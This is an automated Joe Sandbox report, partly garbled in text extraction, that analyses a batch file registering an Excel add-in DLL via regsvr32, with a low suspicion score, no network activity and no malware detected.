ID: 447398 Sample Name: Register.bat Cookbook: default.jbs Time: 17:15:31 Date: 12/07/2021 Version: 32.0.0 Black Diamond Table of Contents

Table of Contents 2 Windows Analysis Report Register.bat 3 Overview 3 General Information 3 Detection 3 Signatures 3 Classification 3 Process Tree 3 Malware Configuration 3 Yara Overview 3 Sigma Overview 3 System Summary: 3 Jbx Signature Overview 3 System Summary: 4 Mitre Att&ck Matrix 4 Behavior Graph 4 Screenshots 4 Thumbnails 5 Antivirus, Machine Learning and Genetic Malware Detection 5 Initial Sample 5 Dropped Files 5 Unpacked PE Files 5 Domains 5 URLs 6 Domains and IPs 6 Contacted Domains 6 Contacted IPs 6 General Information 6 Simulations 6 Behavior and APIs 6 Joe Sandbox View / Context 7 IPs 7 Domains 7 ASN 7 JA3 Fingerprints 7 Dropped Files 7 Created / dropped Files 7 Static File Info 7 General 7 File Icon 7 Network Behavior 8 Code Manipulations 8 Statistics 8 Behavior 8 System Behavior 8 Analysis Process: cmd.exe PID: 2132 Parent PID: 5636 8 General 8 File Activities 8 File Read 8 Analysis Process: conhost.exe PID: 2760 Parent PID: 2132 8 General 8 Analysis Process: regsvr32.exe PID: 4452 Parent PID: 2132 9 General 9 File Activities 9 Disassembly 9 Code Analysis 9

Copyright Joe Security LLC 2021 Page 2 of 9 Windows Analysis Report Register.bat

Overview

General Information Detection Signatures Classification

Sample Register.bat Name: SSiiiggmaa ddeettteeccttteedd::: RReeggssvvrrr3322 AAnnoomaalllyy

Analysis ID: 447398 CSCrirrgeemaatttaee ssd eaat eppcrrrotoeccdee:ss Rss eiiinng ssvuurss3pp2ee nAndndeoedmd maloyo… MD5: 4b61829c0e26ed… PCPrrroeogagrrtraeams a dd opoereossc nenosotstt ssinhh ooswwu s mpeuuncchdh e aadcc ttmtiiivvoiii…

SHA1: 679618a0b0a21d… Ransomware QPruuoeegrrrriiieaesms tt thdheoe e vvsoo llnluuomt ees h iiinnofffwoorr rmauatcttiiiohon na (c((nntiavami … Miner Spreading SHA256: d7694e4f2a4ee59… RQReuegegirissietteesrr stsh aae DDvoLLlLLume information (nam RReeggiiissttteerrrss aa DDLLLL mmaallliiiccciiioouusss Infos: malicious Evader Phishing

sssuusssppiiiccciiioouusss TRTrrreiiieegssis tttoeo r lllsoo aadd D mLiiLissssiiinngg DDLLLLss suspicious

Most interesting Screenshot: cccllleeaann clean Tries to load missing DLLs

Exploiter Banker

Spyware Trojan / Bot

Adware

Score: 22 Range: 0 - 100 Whitelisted: false Confidence: 80%

Process Tree

System is w10x64 cmd.exe (PID: 2132 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\Register.bat' ' MD5: 4E2ACF4F8A396486AB4268C94A6A245F) conhost.exe (PID: 2760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) regsvr32.exe (PID: 4452 cmdline: Regsvr32.exe /i adxloader.Sigma.Mona.ExcelAddin.Reporting.dll MD5: D78B75FC68247E8A63ACBA846182740E) cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Anomaly

Jbx Signature Overview

Click to jump to signature section

Copyright Joe Security LLC 2021 Page 3 of 9 System Summary:

Mitre Att&ck Matrix

Remote Initial Privilege Defense Credential Lateral Command Network Service Access Execution Persistence Escalation Evasion Access Discovery Movement Collection Exfiltration and Control Effects Effects Impact Valid Scripting 1 DLL Side- Process Regsvr32 1 OS Security Remote Data from Exfiltration Data Eavesdrop on Remotely Modify Accounts Loading 1 Injection 1 1 Credential Software Services Local Over Other Obfuscation Insecure Track Device System Dumping Discovery 1 System Network Network Without Partition Medium Communication Authorization Default Scheduled Boot or DLL Side- Process LSASS System Remote Data from Exfiltration Junk Data Exploit SS7 to Remotely Device Accounts Task/Job Logon Loading 1 Injection 1 1 Memory Information Desktop Removable Over Redirect Phone Wipe Data Lockout Initialization Discovery 1 1 Protocol Media Bluetooth Calls/SMS Without Scripts Authorization Domain At (Linux) Logon Script Logon Script Scripting 1 Security Query Registry SMB/Windows Data from Automated Steganography Exploit SS7 to Obtain Delete Accounts (Windows) (Windows) Account Admin Shares Network Exfiltration Track Device Device Device Manager Shared Location Cloud Data Drive Backups Local At Logon Script Logon Script DLL Side- NTDS System Distributed Input Scheduled Protocol SIM Card Carrier Accounts (Windows) (Mac) (Mac) Loading 1 Network Component Capture Transfer Impersonation Swap Billing Configuration Object Model Fraud Discovery

Behavior Graph

Hide Legend Behavior Graph Legend: Process ID: 447398 Signature Sample: Register.bat Created File Startdate: 12/07/2021 DNS/IP Info Architecture: WINDOWS Is Dropped

Score: 22 Is Windows Process

Number of created Registry Values

Number of created Files

Visual Basic Sigma detected: Regsvr32 started Delphi Anomaly Java

.Net C# or VB.NET

C, C++ or other language

Is malicious cmd.exe Internet

1

started started

regsvr32.exe conhost.exe

Screenshots Copyright Joe Security LLC 2021 Page 4 of 9 Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Copyright Joe Security LLC 2021 Page 5 of 9 No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 32.0.0 Black Diamond Analysis ID: 447398 Start date: 12.07.2021 Start time: 17:15:31 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 4m 49s Hypervisor based Inspection enabled: false Report type: light Sample file name: Register.bat Cookbook file name: default.jbs Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 Number of analysed new started processes 26 analysed: Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies: HCA enabled EGA enabled HDC enabled AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: SUS Classification: sus22.winBAT@4/0@0/0 EGA Information: Failed HDC Information: Failed HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 Cookbook Comments: Adjust boot time Enable AMSI Found application associated with file extension: .bat Warnings: Show All

Simulations

Behavior and APIs

Copyright Joe Security LLC 2021 Page 6 of 9 No simulations No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General File type: DOS batch file, ASCII text, with CRLF line terminators Entropy (8bit): 5.24398767650524 TrID: File name: Register.bat File size: 922 MD5: 4b61829c0e26ed154e2bd261aebf2dab SHA1: 679618a0b0a21dd3472bd3c85f97a442c51898aa SHA256: d7694e4f2a4ee592545a2ec559a2f91dff7a3ef9e2e14293 2700bc038b8ba3f4 SHA512: 86c6f0c379cb5c2b8d69e8ed101944f0179ff86c6d91a76 6a921771ac8a8f63dd2f2b06276d12b244eb9da9dceb0b1 f300f0c599fc7eba18f53457d71fd84203 SSDEEP: 24:ZjkAAOyGFZXZ6d8RneSG42XDZXZYPM47RneSF Md2XTUZXZRHM4rGPF+MDP7+MZ1m:qjtGbyaej4wtW PMueCMdwsfHMHF+Mz7i File Content Preview: @ECHO OFF....ECHO...ECHO *** Moving to directory.. ECHO...%~d0..CD "%~p0"..CD....REM...=> Not needed since it is in the same directory => Will be done automat ically by dependance..REM ECHO...REM ECHO *** Re gistering .Net Library in the GAC "AddinExpress.MS

File Icon

Icon Hash: 988686829e9ae600

Copyright Joe Security LLC 2021 Page 7 of 9 Network Behavior

No network behavior found

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: cmd.exe PID: 2132 Parent PID: 5636

General

Start time: 17:16:24 Start date: 12/07/2021 Path: C:\Windows\System32\cmd.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\Register.bat' ' Imagebase: 0x7ff7bf140000 File size: 273920 bytes MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities Show Windows behavior

File Read

Analysis Process: conhost.exe PID: 2760 Parent PID: 2132

General

Start time: 17:16:25 Start date: 12/07/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff774ee0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Copyright Joe Security LLC 2021 Page 8 of 9 Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Analysis Process: regsvr32.exe PID: 4452 Parent PID: 2132

General

Start time: 17:16:25 Start date: 12/07/2021 Path: C:\Windows\System32\regsvr32.exe Wow64 process (32bit): false Commandline: Regsvr32.exe /i adxloader.Sigma.Mona.ExcelAddin.Reporting.dll Imagebase: 0x7ff7d84a0000 File size: 24064 bytes MD5 hash: D78B75FC68247E8A63ACBA846182740E Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities Show Windows behavior

Disassembly

Code Analysis

Copyright Joe Security LLC Joe Sandbox Cloud Basic 32.0.0 Black Diamond

Copyright Joe Security LLC 2021 Page 9 of 9